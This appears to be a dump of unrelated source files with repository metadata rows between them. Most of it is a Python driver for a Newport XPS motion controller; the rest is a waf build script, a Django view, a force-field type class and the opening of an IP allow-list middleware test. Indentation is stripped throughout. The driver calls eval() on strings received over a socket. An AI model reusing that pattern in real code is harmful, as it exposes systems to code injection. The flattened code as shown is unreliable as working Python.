def PositionerDACOffsetGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetGet(' + PositionerName + ',short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetSet : Set DAC offsets
def PositionerDACOffsetSet (self, socketId, PositionerName, DACOffset1, DACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetSet(' + PositionerName + ',' + str(DACOffset1) + ',' + str(DACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetDualGet : Get dual DAC offsets
def PositionerDACOffsetDualGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualGet(' + PositionerName + ',short *,short *,short *,short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDACOffsetDualSet : Set dual DAC offsets
def PositionerDACOffsetDualSet (self, socketId, PositionerName, PrimaryDACOffset1, PrimaryDACOffset2, SecondaryDACOffset1, SecondaryDACOffset2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDACOffsetDualSet(' + PositionerName + ',' + str(PrimaryDACOffset1) + ',' + str(PrimaryDACOffset2) + ',' + str(SecondaryDACOffset1) + ',' + str(SecondaryDACOffset2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorAutoTuning : Astrom&Hagglund based auto-tuning
def PositionerCorrectorAutoTuning (self, socketId, PositionerName, TuningMode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorAutoTuning(' + PositionerName + ',' + str(TuningMode) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAccelerationAutoScaling : Astrom&Hagglund based auto-scaling
def PositionerAccelerationAutoScaling (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAccelerationAutoScaling(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTVerification : Multiple axes PVT trajectory verification
def MultipleAxesPVTVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTVerificationResultGet : Multiple axes PVT trajectory verification result get
def MultipleAxesPVTVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# MultipleAxesPVTExecution : Multiple axes PVT trajectory execution
def MultipleAxesPVTExecution (self, socketId, GroupName, TrajectoryFileName, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTParametersGet : Multiple axes PVT trajectory get parameters
def MultipleAxesPVTParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTParametersGet(' + GroupName + ',char *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# MultipleAxesPVTPulseOutputSet : Configure pulse output on trajectory
def MultipleAxesPVTPulseOutputSet (self, socketId, GroupName, StartElement, EndElement, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputSet(' + GroupName + ',' + str(StartElement) + ',' + str(EndElement) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# MultipleAxesPVTPulseOutputGet : Get pulse output on trajectory configuration
def MultipleAxesPVTPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'MultipleAxesPVTPulseOutputGet(' + GroupName + ',int *,int *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# SingleAxisSlaveModeEnable : Enable the slave mode
def SingleAxisSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveModeDisable : Disable the slave mode
def SingleAxisSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersSet : Set slave parameters
def SingleAxisSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SingleAxisSlaveParametersGet : Get slave parameters
def SingleAxisSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SingleAxisSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# SpindleSlaveModeEnable : Enable the slave mode
def SpindleSlaveModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveModeDisable : Disable the slave mode
def SpindleSlaveModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersSet : Set slave parameters
def SpindleSlaveParametersSet (self, socketId, GroupName, PositionerName, Ratio):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersSet(' + GroupName + ',' + PositionerName + ',' + str(Ratio) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SpindleSlaveParametersGet : Get slave parameters
def SpindleSlaveParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SpindleSlaveParametersGet(' + GroupName + ',char *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupSpinParametersSet : Modify Spin parameters on selected group and activate the continuous move
def GroupSpinParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersSet(' + GroupName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupSpinParametersGet : Get Spin parameters on selected group
def GroupSpinParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinParametersGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinCurrentGet : Get Spin current on selected group
def GroupSpinCurrentGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinCurrentGet(' + GroupName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupSpinModeStop : Stop Spin mode on selected group with specified acceleration
def GroupSpinModeStop (self, socketId, GroupName, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupSpinModeStop(' + GroupName + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerification : XY trajectory verification
def XYLineArcVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcVerificationResultGet : XY trajectory verification result get
def XYLineArcVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcExecution : XY trajectory execution
def XYLineArcExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration, ExecutionNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(ExecutionNumber) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcParametersGet : XY trajectory get parameters
def XYLineArcParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYLineArcPulseOutputSet : Configure pulse output on trajectory
def XYLineArcPulseOutputSet (self, socketId, GroupName, StartLength, EndLength, PathLengthInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputSet(' + GroupName + ',' + str(StartLength) + ',' + str(EndLength) + ',' + str(PathLengthInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYLineArcPulseOutputGet : Get pulse output on trajectory configuration
def XYLineArcPulseOutputGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYLineArcPulseOutputGet(' + GroupName + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZGroupPositionCorrectedProfilerGet : Return corrected profiler positions
def XYZGroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY, PositionZ):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZGroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',' + str(PositionZ) + ',double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineVerification : XYZ trajectory verifivation
def XYZSplineVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineVerificationResultGet : XYZ trajectory verification result get
def XYZSplineVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineExecution : XYZ trajectory execution
def XYZSplineExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineParametersGet : XYZ trajectory get parameters
def XYZSplineParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# OptionalModuleExecute : Execute an optional module
def OptionalModuleExecute (self, socketId, ModuleFileName, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleExecute(' + ModuleFileName + ',' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# OptionalModuleKill : Kill an optional module
def OptionalModuleKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMCIESet : Set CIE EEPROM reference string
def EEPROMCIESet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMCIESet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDACOffsetCIESet : Set CIE DAC offsets
def EEPROMDACOffsetCIESet (self, socketId, PlugNumber, DAC1Offset, DAC2Offset):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDACOffsetCIESet(' + str(PlugNumber) + ',' + str(DAC1Offset) + ',' + str(DAC2Offset) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDriverSet : Set Driver EEPROM reference string
def EEPROMDriverSet (self, socketId, PlugNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDriverSet(' + str(PlugNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMINTSet : Set INT EEPROM reference string
def EEPROMINTSet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMINTSet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CPUCoreAndBoardSupplyVoltagesGet : Get power informations
def CPUCoreAndBoardSupplyVoltagesGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUCoreAndBoardSupplyVoltagesGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# CPUTemperatureAndFanSpeedGet : Get CPU temperature and fan speed
def CPUTemperatureAndFanSpeedGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUTemperatureAndFanSpeedGet(double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ActionListGet : Action list
def ActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ActionExtendedListGet : Action extended list
def ActionExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIExtendedListGet : API method list
def APIExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIListGet : API method list without extended API
def APIListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ControllerStatusListGet : Controller status list
def ControllerStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ErrorListGet : Error list
def ErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventListGet : General event list
def EventListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringListGet : Gathering type list
def GatheringListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExtendedListGet : Gathering type extended list
def GatheringExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalListGet : External Gathering type list
def GatheringExternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusListGet : Group status list
def GroupStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareInternalListGet : Internal hardware list
def HardwareInternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareInternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDriverAndStageGet : Smart hardware
def HardwareDriverAndStageGet (self, socketId, PlugNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDriverAndStageGet(' + str(PlugNumber) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ObjectsListGet : Group name and positioner name
def ObjectsListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ObjectsListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerErrorListGet : Positioner error list
def PositionerErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardwareStatusListGet : Positioner hardware status list
def PositionerHardwareStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverStatusListGet : Positioner driver status list
def PositionerDriverStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingActionListGet : Get referencing action list
def ReferencingActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingSensorListGet : Get referencing sensor list
def ReferencingSensorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingSensorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringUserDatasGet : Return user data values
def GatheringUserDatasGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringUserDatasGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxGet : Get controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxGet(double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxReset : Reset controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SocketsStatusGet : Get sockets current status
def SocketsStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SocketsStatusGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TestTCP : Test TCP/IP transfert
def TestTCP (self, socketId, InputString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TestTCP(' + InputString + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
| [
"[email protected]"
] | |
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090 | b677894966f2ae2d0585a31f163a362e41a3eae0 | /ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript | 575c486512db2596263726622d81756947c7266d | [
"LGPL-2.1-only",
"Apache-2.0"
] | permissive | cyliustack/clusim | 667a9eef2e1ea8dad1511fd405f3191d150a04a8 | cbedcf671ba19fded26e4776c0e068f81f068dfd | refs/heads/master | 2022-10-06T20:14:43.052930 | 2022-10-01T19:42:19 | 2022-10-01T19:42:19 | 99,692,344 | 7 | 3 | Apache-2.0 | 2018-07-04T10:09:24 | 2017-08-08T12:51:33 | Python | UTF-8 | Python | false | false | 1,018 | ## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
if 0:
DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
env = bld.env
env['TOP_SRCDIR'] = bld.srcnode.abspath()
bindgen = bld(
features='command',
source='barmodulegen.py',
target='barmodule.cc',
command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
if env['CXX'] and env['ENABLE_BOOST_SHARED_PTR'] == True:
obj = bld(features='cxx cxxshlib pyext')
obj.source = [
'bar.cc',
'barmodule.cc'
]
obj.target = 'bar'
obj.install_path = None
obj.env.append_value("INCLUDES", '.')
| [
"[email protected]"
] | ||
2aea9148c27a7fbf9f644d8c40edb2525fad701b | dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a | /app/src/apps/stats/topological_stat/views.py | 7c0caf2793ef1aa6e631cff093ebcec9992ed96e | [] | no_license | BarbaraDiazE/D_Peptide_Builder | 7aa4647c9b0ce20d8a258834d0dffaf21e368224 | d47e29e0b9e55bd6e520bc9caf7d362e796d458d | refs/heads/master | 2020-04-25T02:29:03.092694 | 2019-02-25T20:43:19 | 2019-02-25T20:43:19 | 172,440,859 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
def get(self, request):
csv_name = request.session['csv_name']
stat = statTOPOLOGICAL(csv_name)
stat_topological_html = stat.resolve()
context = {'loaded_data': stat_topological_html}
return render(request, 'stats_topological.html', context) | [
"[email protected]"
] | |
1908f8673019ee60a62183f9409a6ca86cd08649 | 358519772669c73092f625f630722c38e1d33783 | /ctools/Testing/Types/ImproperDihedral2Type.py | 3855f86040c5114b8995f4d188699f85bb2a3205 | [] | no_license | minghao2016/mmtools | e7e61aca084498408ceae965dd6c9450ad89eafa | 3ade988afb51cd54ee5a4067d8deaad88afbb0fe | refs/heads/master | 2021-09-21T01:02:22.522187 | 2014-09-19T03:40:03 | 2014-09-19T03:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | import sys
sys.path.append('..')
from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
| [
"[email protected]"
] | |
76685f23ac80025d9fc64fa03036df7c4bbdbbbe | 485816a0a8b86818e4f2cefec517e6316e2252d6 | /posthog/test/test_middleware.py | e7bd0e8275c8ba6c3d46790e80193e5a60a215f4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | abhijitghate/posthog | 3647443274aee6431e7fecf6902644a9fa7eb9d8 | 68dc4d2730600efb00d3708fb7fba70d85612760 | refs/heads/master | 2023-04-19T15:17:25.033992 | 2021-05-13T09:48:59 | 2021-05-13T09:48:59 | 279,130,099 | 1 | 0 | MIT | 2020-07-12T19:04:15 | 2020-07-12T19:04:14 | null | UTF-8 | Python | false | false | 6,775 | py | from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
Also test that capture endpoint is not restrictied by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
